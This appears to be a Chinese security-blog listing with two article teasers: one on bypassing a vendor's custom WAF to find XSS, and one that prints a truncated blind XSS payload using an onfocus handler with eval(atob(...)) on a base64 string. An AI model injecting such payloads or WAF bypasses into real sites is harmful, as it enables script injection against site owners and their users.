安全文章 实战 | 多手法绕过WAF挖掘某知名厂商XSS 在某最近在测试某知名安全厂商的过程中,发现其一处重要业务的子域竟出现了难得一见的自研WAF,如此一来勾起了我的兴趣~仔细研究该业务点后,发现某处传参,会直接将传参内容写入JS中,大大的危险于是与WAF... 10月25日21 views评论eval xss 阅读全文
安全文章 Blind XSS Payload:"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg... 06月07日19 views评论http xss 阅读全文